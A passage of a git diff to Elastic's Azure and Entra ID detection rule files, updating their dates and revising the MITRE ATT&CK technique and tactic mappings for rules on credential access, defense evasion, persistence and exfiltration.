"MITRE ATT&CK" + [[rule.threat.technique]] id = "T1528" name = "Steal Application Access Token" reference = "https://attack.mitre.org/techniques/T1528/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [[rule.threat.technique.subtechnique]] id = "T1566.002" name = "Spearphishing Link" reference = "https://attack.mitre.org/techniques/T1566/002/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" - diff --git a/rules/integrations/azure/credential_access_azure_service_principal_signin_then_arc_credential_listing.toml b/rules/integrations/azure/credential_access_azure_service_principal_signin_then_arc_credential_listing.toml index 563375a5e1b..feb44f03e01 100644 --- a/rules/integrations/azure/credential_access_azure_service_principal_signin_then_arc_credential_listing.toml +++ b/rules/integrations/azure/credential_access_azure_service_principal_signin_then_arc_credential_listing.toml @@ -2,7 +2,7 @@ creation_date = "2026/03/10" integration = ["azure"] maturity = "production" -updated_date = "2026/03/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -100,39 +100,44 @@ sequence with maxspan=30m [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1528" +name = "Steal Application Access Token" +reference = "https://attack.mitre.org/techniques/T1528/" + [[rule.threat.technique]] id = "T1552" name = "Unsecured Credentials" reference = "https://attack.mitre.org/techniques/T1552/" + [[rule.threat.technique.subtechnique]] id = "T1552.007" name = "Container API" reference = "https://attack.mitre.org/techniques/T1552/007/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/azure/credential_access_entra_id_suspicious_signin.toml b/rules/integrations/azure/credential_access_entra_id_suspicious_signin.toml index b1e86ae2c14..2f571c6638a 100644 --- a/rules/integrations/azure/credential_access_entra_id_suspicious_signin.toml +++ b/rules/integrations/azure/credential_access_entra_id_suspicious_signin.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/28" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -135,30 +135,59 @@ from logs-azure.signinlogs-* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1528" name = "Steal Application Access Token" reference = "https://attack.mitre.org/techniques/T1528/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [[rule.threat.technique.subtechnique]] id = "T1566.002" name = "Spearphishing Link" reference = "https://attack.mitre.org/techniques/T1566/002/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" + +[[rule.threat.technique.subtechnique]] +id = "T1550.001" +name = "Application Access Token" +reference = "https://attack.mitre.org/techniques/T1550/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/azure/credential_access_key_vault_excessive_retrieval.toml b/rules/integrations/azure/credential_access_key_vault_excessive_retrieval.toml index b1b7021a706..45e975c3b2b 100644 --- a/rules/integrations/azure/credential_access_key_vault_excessive_retrieval.toml +++ b/rules/integrations/azure/credential_access_key_vault_excessive_retrieval.toml @@ -2,7 +2,7 @@ creation_date = "2025/07/10" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -175,19 +175,31 @@ by Esql.time_window_date_trunc, azure.platformlogs.identity.claim.upn [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1555" name = "Credentials from Password Stores" reference = "https://attack.mitre.org/techniques/T1555/" + [[rule.threat.technique.subtechnique]] id = "T1555.006" name = "Cloud Secrets Management Stores" reference = "https://attack.mitre.org/techniques/T1555/006/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1213" +name = "Data from Information Repositories" +reference = "https://attack.mitre.org/techniques/T1213/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" diff --git a/rules/integrations/azure/credential_access_network_full_network_packet_capture_detected.toml b/rules/integrations/azure/credential_access_network_full_network_packet_capture_detected.toml index e23245673c1..c09f67d0a5a 100644 --- a/rules/integrations/azure/credential_access_network_full_network_packet_capture_detected.toml +++ b/rules/integrations/azure/credential_access_network_full_network_packet_capture_detected.toml @@ -2,7 +2,7 @@ creation_date = "2021/08/12" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Austin Songer"] @@ -83,14 +83,26 @@ event.outcome:(Success or success) [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1040" name = "Network Sniffing" reference = "https://attack.mitre.org/techniques/T1040/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1040" +name = "Network Sniffing" +reference = "https://attack.mitre.org/techniques/T1040/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" diff --git a/rules/integrations/azure/credential_access_storage_account_key_regenerated.toml b/rules/integrations/azure/credential_access_storage_account_key_regenerated.toml index 8a88cceeb2f..2992628f85d 100644 --- a/rules/integrations/azure/credential_access_storage_account_key_regenerated.toml +++ b/rules/integrations/azure/credential_access_storage_account_key_regenerated.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/19" integration = ["azure"] maturity = "production" -updated_date = "2025/09/30" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -84,34 +84,54 @@ event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOF [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1552" name = "Unsecured Credentials" reference = "https://attack.mitre.org/techniques/T1552/" + [[rule.threat.technique.subtechnique]] id = "T1552.005" name = "Cloud Instance Metadata API" reference = "https://attack.mitre.org/techniques/T1552/005/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.001" name = "Additional Cloud Credentials" reference = "https://attack.mitre.org/techniques/T1098/001/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.001" +name = "Additional Cloud Credentials" +reference = "https://attack.mitre.org/techniques/T1098/001/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/azure/defense_evasion_automation_runbook_deleted.toml b/rules/integrations/azure/defense_evasion_automation_runbook_deleted.toml index d9817465e01..a7edb7fe4fa 100644 --- a/rules/integrations/azure/defense_evasion_automation_runbook_deleted.toml +++ b/rules/integrations/azure/defense_evasion_automation_runbook_deleted.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/01" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -81,3 +81,15 @@ id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1485" +name = "Data Destruction" +reference = "https://attack.mitre.org/techniques/T1485/" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules/integrations/azure/defense_evasion_event_hub_deletion.toml b/rules/integrations/azure/defense_evasion_event_hub_deletion.toml index 5b308cfc613..42fb0d38b32 100644 --- a/rules/integrations/azure/defense_evasion_event_hub_deletion.toml +++ b/rules/integrations/azure/defense_evasion_event_hub_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/18" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -80,19 +80,31 @@ event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOF [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.008" name = "Disable or Modify Cloud Logs" reference = "https://attack.mitre.org/techniques/T1562/008/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1485" +name = "Data Destruction" +reference = "https://attack.mitre.org/techniques/T1485/" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules/integrations/azure/defense_evasion_kubernetes_events_deleted.toml b/rules/integrations/azure/defense_evasion_kubernetes_events_deleted.toml index 76a3d0239cb..2216b229f91 100644 --- a/rules/integrations/azure/defense_evasion_kubernetes_events_deleted.toml +++ b/rules/integrations/azure/defense_evasion_kubernetes_events_deleted.toml @@ -2,7 +2,7 @@ creation_date = "2021/06/24" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Austin Songer"] @@ -80,19 +80,23 @@ event.outcome:(Success or success) [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" - +[[rule.threat.technique.subtechnique]] +id = "T1562.008" +name = "Disable or Modify Cloud Logs" +reference = "https://attack.mitre.org/techniques/T1562/008/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/azure/defense_evasion_network_watcher_deletion.toml b/rules/integrations/azure/defense_evasion_network_watcher_deletion.toml index 0acbfc2f754..80d0f3312ef 100644 --- a/rules/integrations/azure/defense_evasion_network_watcher_deletion.toml +++ b/rules/integrations/azure/defense_evasion_network_watcher_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/31" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -81,19 +81,23 @@ event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOF [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" - +[[rule.threat.technique.subtechnique]] +id = "T1562.008" +name = "Disable or Modify Cloud Logs" +reference = "https://attack.mitre.org/techniques/T1562/008/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/azure/defense_evasion_security_alert_suppression_rule_created.toml b/rules/integrations/azure/defense_evasion_security_alert_suppression_rule_created.toml index 5421c5675f8..6a7f6f9d035 100644 --- a/rules/integrations/azure/defense_evasion_security_alert_suppression_rule_created.toml +++ b/rules/integrations/azure/defense_evasion_security_alert_suppression_rule_created.toml @@ -2,7 +2,7 @@ creation_date = "2021/08/27" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Austin Songer"] @@ -81,14 +81,18 @@ event.outcome: "success" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/azure/execution_automation_runbook_created_or_modified.toml b/rules/integrations/azure/execution_automation_runbook_created_or_modified.toml index 2cddd4d8398..c70aad56309 100644 --- a/rules/integrations/azure/execution_automation_runbook_created_or_modified.toml +++ b/rules/integrations/azure/execution_automation_runbook_created_or_modified.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/18" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -80,6 +80,7 @@ event.dataset:azure.activitylogs and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1648" name = "Serverless Execution" @@ -90,3 +91,15 @@ id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1053" +name = "Scheduled Task/Job" +reference = "https://attack.mitre.org/techniques/T1053/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/azure/exfiltration_azure_storage_blob_download_azcopy_sas_token.toml b/rules/integrations/azure/exfiltration_azure_storage_blob_download_azcopy_sas_token.toml index ca5229f3624..e24a3b4a3a3 100644 --- a/rules/integrations/azure/exfiltration_azure_storage_blob_download_azcopy_sas_token.toml +++ b/rules/integrations/azure/exfiltration_azure_storage_blob_download_azcopy_sas_token.toml @@ -2,7 +2,7 @@ creation_date = "2025/10/02" integration = ["azure"] maturity = "production" -updated_date = "2025/10/02" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -95,22 +95,34 @@ event.dataset: azure.platformlogs and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1567" name = "Exfiltration Over Web Service" reference = "https://attack.mitre.org/techniques/T1567/" + [[rule.threat.technique.subtechnique]] id = "T1567.002" name = "Exfiltration to Cloud Storage" reference = "https://attack.mitre.org/techniques/T1567/002/" - - [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1530" +name = "Data from Cloud Storage" +reference = "https://attack.mitre.org/techniques/T1530/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" [rule.new_terms] field = "new_terms_fields" value = ["azure.platformlogs.properties.accountName"] diff --git a/rules/integrations/azure/impact_key_vault_modified_by_unusual_user.toml b/rules/integrations/azure/impact_key_vault_modified_by_unusual_user.toml index 8388ea6ebe5..da3cbcf9a01 100644 --- a/rules/integrations/azure/impact_key_vault_modified_by_unusual_user.toml +++ b/rules/integrations/azure/impact_key_vault_modified_by_unusual_user.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/31" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -86,6 +86,23 @@ id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1578" +name = "Modify Cloud Compute Infrastructure" +reference = "https://attack.mitre.org/techniques/T1578/" + +[[rule.threat.technique.subtechnique]] +id = "T1578.005" +name = "Modify Cloud Compute Configurations" +reference = "https://attack.mitre.org/techniques/T1578/005/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.new_terms] field = "new_terms_fields" value = ["azure.activitylogs.identity.claims_initiated_by_user.name"] diff --git a/rules/integrations/azure/initial_access_azure_arc_cluster_credential_access_unusual_source.toml b/rules/integrations/azure/initial_access_azure_arc_cluster_credential_access_unusual_source.toml index e394d39c999..c2c69a968d2 100644 --- a/rules/integrations/azure/initial_access_azure_arc_cluster_credential_access_unusual_source.toml +++ b/rules/integrations/azure/initial_access_azure_arc_cluster_credential_access_unusual_source.toml @@ -2,7 +2,7 @@ creation_date = "2026/03/10" integration = ["azure"] maturity = "production" -updated_date = "2026/03/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -89,39 +89,57 @@ event.dataset: "azure.activitylogs" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1552" name = "Unsecured Credentials" reference = "https://attack.mitre.org/techniques/T1552/" + [[rule.threat.technique.subtechnique]] id = "T1552.007" name = "Container API" reference = "https://attack.mitre.org/techniques/T1552/007/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/azure/initial_access_azure_service_principal_signin_multiple_countries.toml b/rules/integrations/azure/initial_access_azure_service_principal_signin_multiple_countries.toml index c844468a7a5..afd959b1ce0 100644 --- a/rules/integrations/azure/initial_access_azure_service_principal_signin_multiple_countries.toml +++ b/rules/integrations/azure/initial_access_azure_service_principal_signin_multiple_countries.toml @@ -2,7 +2,7 @@ creation_date = "2026/03/10" integration = ["azure"] maturity = "production" -updated_date = "2026/03/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -125,22 +125,39 @@ FROM logs-azure.signinlogs-* metadata _id, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.investigation_fields] field_names = [ "azure.signinlogs.properties.service_principal_id", diff --git a/rules/integrations/azure/initial_access_entra_id_actor_token_user_impersonation_abuse.toml b/rules/integrations/azure/initial_access_entra_id_actor_token_user_impersonation_abuse.toml index 1ef19b65dbd..117f4401963 100644 --- a/rules/integrations/azure/initial_access_entra_id_actor_token_user_impersonation_abuse.toml +++ b/rules/integrations/azure/initial_access_entra_id_actor_token_user_impersonation_abuse.toml @@ -2,7 +2,7 @@ creation_date = "2025/09/18" integration = ["azure"] maturity = "production" -updated_date = "2025/12/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -106,31 +106,49 @@ from logs-azure.auditlogs-* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" + +[[rule.threat.technique.subtechnique]] +id = "T1550.001" +name = "Application Access Token" +reference = "https://attack.mitre.org/techniques/T1550/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/azure/initial_access_entra_id_device_code_auth_with_broker_client.toml b/rules/integrations/azure/initial_access_entra_id_device_code_auth_with_broker_client.toml index 9ea2a42f57b..83c4a5b1447 100644 --- a/rules/integrations/azure/initial_access_entra_id_device_code_auth_with_broker_client.toml +++ b/rules/integrations/azure/initial_access_entra_id_device_code_auth_with_broker_client.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/24" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -83,35 +83,50 @@ Entra ID Device Code Authentication allows users to authenticate devices using a [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [[rule.threat.technique.subtechnique]] id = "T1566.002" name = "Spearphishing Link" reference = "https://attack.mitre.org/techniques/T1566/002/" +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1550" name = "Use Alternate Authentication Material" reference = "https://attack.mitre.org/techniques/T1550/" + [[rule.threat.technique.subtechnique]] id = "T1550.001" name = "Application Access Token" @@ -121,4 +136,3 @@ reference = "https://attack.mitre.org/techniques/T1550/001/" id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/azure/initial_access_entra_id_external_guest_user_invite.toml b/rules/integrations/azure/initial_access_entra_id_external_guest_user_invite.toml index 09ce8630b50..4425f39fcce 100644 --- a/rules/integrations/azure/initial_access_entra_id_external_guest_user_invite.toml +++ b/rules/integrations/azure/initial_access_entra_id_external_guest_user_invite.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/31" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -78,26 +78,36 @@ event.dataset:azure.auditlogs and azure.auditlogs.operation_name:"Invite externa [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique]] +id = "T1136" +name = "Create Account" +reference = "https://attack.mitre.org/techniques/T1136/" + +[[rule.threat.technique.subtechnique]] +id = "T1136.003" +name = "Cloud Account" +reference = "https://attack.mitre.org/techniques/T1136/003/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/integrations/azure/initial_access_entra_id_federated_login_by_unusual_client.toml b/rules/integrations/azure/initial_access_entra_id_federated_login_by_unusual_client.toml index 61dc6a1a52f..4ec0e262a58 100644 --- a/rules/integrations/azure/initial_access_entra_id_federated_login_by_unusual_client.toml +++ b/rules/integrations/azure/initial_access_entra_id_federated_login_by_unusual_client.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/09" integration = ["azure"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -108,17 +108,17 @@ event.dataset: "azure.signinlogs" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" @@ -126,22 +126,39 @@ reference = "https://attack.mitre.org/tactics/TA0001/" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1550" name = "Use Alternate Authentication Material" reference = "https://attack.mitre.org/techniques/T1550/" + [[rule.threat.technique.subtechnique]] id = "T1550.001" name = "Application Access Token" reference = "https://attack.mitre.org/techniques/T1550/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.001" +name = "Additional Cloud Credentials" +reference = "https://attack.mitre.org/techniques/T1098/001/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [rule.investigation_fields] field_names = [ "azure.signinlogs.properties.service_principal_name", diff --git a/rules/integrations/azure/initial_access_entra_id_first_time_seen_device_code_auth.toml b/rules/integrations/azure/initial_access_entra_id_first_time_seen_device_code_auth.toml index 6ff9e5edd71..43a2a424aa0 100644 --- a/rules/integrations/azure/initial_access_entra_id_first_time_seen_device_code_auth.toml +++ b/rules/integrations/azure/initial_access_entra_id_first_time_seen_device_code_auth.toml @@ -2,7 +2,7 @@ creation_date = "2024/10/14" integration = ["azure"] maturity = "production" -updated_date = "2026/02/26" +updated_date = "2026/03/24" [rule] author = ["Elastic", "Matteo Potito Giorgio"] @@ -107,30 +107,44 @@ event.dataset:(azure.activitylogs or azure.signinlogs) [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" -[[rule.threat.technique.subtechnique]] -id = "T1566.002" -name = "Spearphishing Link" -reference = "https://attack.mitre.org/techniques/T1566/002/" [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" +[[rule.threat.technique]] +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" + +[[rule.threat.technique.subtechnique]] +id = "T1566.002" +name = "Spearphishing Link" +reference = "https://attack.mitre.org/techniques/T1566/002/" [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1528" +name 